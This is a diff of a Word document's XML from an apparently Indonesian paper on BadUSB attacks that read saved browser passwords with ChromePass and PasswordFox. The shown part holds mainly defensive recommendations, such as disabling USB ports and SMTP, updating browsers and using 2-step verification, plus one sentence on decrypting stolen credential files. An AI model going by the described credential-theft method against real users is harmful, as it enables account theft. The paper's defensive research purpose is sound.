+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pada </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">browser </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>apapun untuk menghindari segala bentuk pengambilan data baik menggunakan BadUSB ataupun metode lainnya.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
         <w:t>Menggunakan fitur 2-</w:t>
       </w:r>
       <w:r>
@@ -8476,7 +11818,33 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
+        <w:t xml:space="preserve">browser </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">agar jika terjadi pengambilan data pada </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
         <w:t>browser</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>, data tersebut tidak berguna bagi penyerang atau sulit untuk gunakan karena menggunakan pengamanan berlapis.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8518,31 +11886,95 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Mematikan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">port </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>USB pada perangkat komputer</w:t>
+      <w:bookmarkStart w:id="24" w:name="_Hlk43424722"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Selalu melakukan pembaruan pada </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>browser</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Google Chrome dan Mozilla Firefox</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="24"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> saat tersedia untuk meningkatkan keamanan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>login data</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sehingga ChromePass dan PasswordFox tidak dapat membaca </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> yang tersimpan.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8566,7 +11998,121 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>Memblokir Unduhan Powershell</w:t>
+        <w:t xml:space="preserve">Mematikan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">port </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">USB melalui Windows </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Registry</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pada perangkat komputer dapat mencegah perangkat USB yang terhubung dibaca oleh komputer sehingga terhindar dari segala bentuk penyerangan menggunakan BadUSB.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Melakukan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>disable</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>port</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> SMTP agar jika terjadi penyerangan yang membutuhkan pengiriman </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>email</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> melalui komputer target tidak dapat dilakukan.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8599,7 +12145,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:ind w:left="317"/>
+        <w:ind w:left="317" w:firstLine="392"/>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
@@ -8796,7 +12342,16 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve"> yang disimpan pada direktori C: komputer target kemudian di dekripsi sehingga menampilkan </w:t>
+        <w:t xml:space="preserve"> yang disimpan pada </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">direktori C: komputer target kemudian di dekripsi sehingga menampilkan </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8986,6 +12541,18 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:left="1004"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:widowControl/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="9"/>
@@ -8994,82 +12561,382 @@
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>...</w:t>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Rekomendasi untuk meminimalisir terjadinya penyerangan seperti ini dapat dilihat berdasarkan dua aspek berikut:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
-        <w:ind w:left="1004"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:ind w:left="1560" w:hanging="426"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Pengguna</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
-        <w:ind w:left="1004"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="14"/>
+        </w:numPr>
+        <w:ind w:left="1843" w:hanging="283"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="25" w:name="_Hlk43429609"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Memperhatikan komputer agar tidak dihubungkan dengan perangkat USB yang mencurigakan</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
-        <w:ind w:left="1004"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="14"/>
+        </w:numPr>
+        <w:ind w:left="1843" w:hanging="283"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Mematikan atau mengunci komputer saat sedang ditinggalkan </w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
-        <w:ind w:left="1004"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="14"/>
+        </w:numPr>
+        <w:ind w:left="1843" w:hanging="283"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tidak menyimpan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">username </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pada </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">browser </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>apapun</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
-        <w:ind w:left="1004"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="14"/>
+        </w:numPr>
+        <w:ind w:left="1843" w:hanging="283"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Menggunakan fitur 2-step verification pada akun pribadi baik tersimpan maupun tidak pada </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>browser</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="25"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
-        <w:ind w:left="1004"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:ind w:left="1560" w:hanging="426"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Sistem</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="15"/>
+        </w:numPr>
+        <w:ind w:left="1843" w:hanging="283"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="26" w:name="_Hlk43429778"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Selalu melakukan pembaruan pada </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>browser</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Google Chrome dan Mozilla Firefox</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="26"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="15"/>
+        </w:numPr>
+        <w:ind w:left="1843" w:hanging="283"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Mematikan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>port</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> USB pada perangkat komputer</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="27" w:name="_Hlk43429802"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="15"/>
+        </w:numPr>
+        <w:ind w:left="1843" w:hanging="283"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Melakukan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>disable</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>port</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> SMTP</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="27"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -9102,13 +12969,12 @@
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Saran</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:ind w:left="317"/>
+        <w:ind w:left="317" w:firstLine="360"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="20"/>
@@ -9263,18 +13129,62 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pBdr>
-          <w:top w:val="nil"/>
-          <w:left w:val="nil"/>
-          <w:bottom w:val="nil"/>
-          <w:right w:val="nil"/>
-          <w:between w:val="nil"/>
-        </w:pBdr>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Melakukan penelitian menggunakan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>antivirus</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> selain Windows </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Defender</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> untuk mencegah berjalannya program yang mencurigakan pada komputer.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -9339,47 +13249,26 @@
           <w:docPartUnique/>
         </w:docPartObj>
       </w:sdtPr>
-      <w:sdtEndPr>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:sdtEndPr>
       <w:sdtContent>
         <w:sdt>
           <w:sdtPr>
             <w:id w:val="111145805"/>
             <w:bibliography/>
           </w:sdtPr>
-          <w:sdtEndPr>
-            <w:rPr>
-              <w:b w:val="0"/>
-              <w:sz w:val="22"/>
-              <w:szCs w:val="22"/>
-            </w:rPr>
-          </w:sdtEndPr>
           <w:sdtContent>
             <w:p>
               <w:pPr>
-                <w:pStyle w:val="Heading1"/>
                 <w:rPr>
                   <w:noProof/>
                 </w:rPr>
               </w:pPr>
               <w:r>
-                <w:rPr>
-                  <w:b w:val="0"/>
-                </w:rPr>
                 <w:fldChar w:fldCharType="begin"/>
               </w:r>
               <w:r>
                 <w:instrText xml:space="preserve"> BIBLIOGRAPHY </w:instrText>
               </w:r>
               <w:r>
-                <w:rPr>
-                  <w:b w:val="0"/>
-                </w:rPr>
                 <w:fldChar w:fldCharType="separate"/>
               </w:r>
             </w:p>
@@ -9387,6 +13276,7 @@
               <w:tblPr>
                 <w:tblW w:w="5000" w:type="pct"/>
                 <w:tblCellSpacing w:w="15" w:type="dxa"/>
+                <w:tblInd w:w="178" w:type="dxa"/>
                 <w:tblCellMar>
                   <w:top w:w="15" w:type="dxa"/>
                   <w:left w:w="15" w:type="dxa"/>
@@ -9396,23 +13286,22 @@
                 <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
               </w:tblPr>
               <w:tblGrid>
-                <w:gridCol w:w="726"/>
-                <w:gridCol w:w="8634"/>
+                <w:gridCol w:w="442"/>
+                <w:gridCol w:w="8918"/>
               </w:tblGrid>
               <w:tr>
                 <w:trPr>
-                  <w:divId w:val="839932723"/>
+                  <w:divId w:val="1085028495"/>
                   <w:tblCellSpacing w:w="15" w:type="dxa"/>
                 </w:trPr>
                 <w:tc>
                   <w:tcPr>
-                    <w:tcW w:w="50" w:type="pct"/>
+                    <w:tcW w:w="212" w:type="pct"/>
                     <w:hideMark/>
                   </w:tcPr>
                   <w:p>
                     <w:pPr>
                       <w:pStyle w:val="Bibliography"/>
-                      <w:ind w:left="284"/>
                       <w:rPr>
                         <w:noProof/>
                         <w:sz w:val="24"/>
@@ -9459,18 +13348,17 @@
               </w:tr>
               <w:tr>
                 <w:trPr>
-                  <w:divId w:val="839932723"/>
+                  <w:divId w:val="1085028495"/>
                   <w:tblCellSpacing w:w="15" w:type="dxa"/>
                 </w:trPr>
                 <w:tc>
                   <w:tcPr>
-                    <w:tcW w:w="50" w:type="pct"/>
+                    <w:tcW w:w="212" w:type="pct"/>
                     <w:hideMark/>
                   </w:tcPr>
                   <w:p>
                     <w:pPr>
                       <w:pStyle w:val="Bibliography"/>
-                      <w:ind w:left="284"/>
                       <w:rPr>
                         <w:noProof/>
                         <w:lang w:val="id-ID"/>
@@ -9515,18 +13403,17 @@
               </w:tr>
               <w:tr>
                 <w:trPr>
-                  <w:divId w:val="839932723"/>
+                  <w:divId w:val="1085028495"/>
                   <w:tblCellSpacing w:w="15" w:type="dxa"/>
                 </w:trPr>
                 <w:tc>
                   <w:tcPr>
-                    <w:tcW w:w="50" w:type="pct"/>
+                    <w:tcW w:w="212" w:type="pct"/>
                     <w:hideMark/>
                   </w:tcPr>
                   <w:p>
                     <w:pPr>
                       <w:pStyle w:val="Bibliography"/>
-                      <w:ind w:left="284"/>
                       <w:rPr>
                         <w:noProof/>
                         <w:lang w:val="id-ID"/>
@@ -9571,18 +13458,17 @@
               </w:tr>
               <w:tr>
                 <w:trPr>
-                  <w:divId w:val="839932723"/>
+                  <w:divId w:val="1085028495"/>
                   <w:tblCellSpacing w:w="15" w:type="dxa"/>
                 </w:trPr>
                 <w:tc>
                   <w:tcPr>
-                    <w:tcW w:w="50" w:type="pct"/>
+                    <w:tcW w:w="212" w:type="pct"/>
                     <w:hideMark/>
                   </w:tcPr>
                   <w:p>
                     <w:pPr>
                       <w:pStyle w:val="Bibliography"/>
-                      <w:ind w:left="284"/>
                       <w:rPr>
                         <w:noProof/>
                         <w:lang w:val="id-ID"/>
@@ -9647,18 +13533,17 @@
               </w:tr>
               <w:tr>
                 <w:trPr>
-                  <w:divId w:val="839932723"/>
+                  <w:divId w:val="1085028495"/>
                   <w:tblCellSpacing w:w="15" w:type="dxa"/>
                 </w:trPr>
                 <w:tc>
                   <w:tcPr>
-                    <w:tcW w:w="50" w:type="pct"/>
+                    <w:tcW w:w="212" w:type="pct"/>
                     <w:hideMark/>
                   </w:tcPr>
                   <w:p>
                     <w:pPr>
                       <w:pStyle w:val="Bibliography"/>
-                      <w:ind w:left="284"/>
                       <w:rPr>
                         <w:noProof/>
                         <w:lang w:val="id-ID"/>
@@ -9723,18 +13608,17 @@
               </w:tr>
               <w:tr>
                 <w:trPr>
-                  <w:divId w:val="839932723"/>
+                  <w:divId w:val="1085028495"/>
                   <w:tblCellSpacing w:w="15" w:type="dxa"/>
                 </w:trPr>
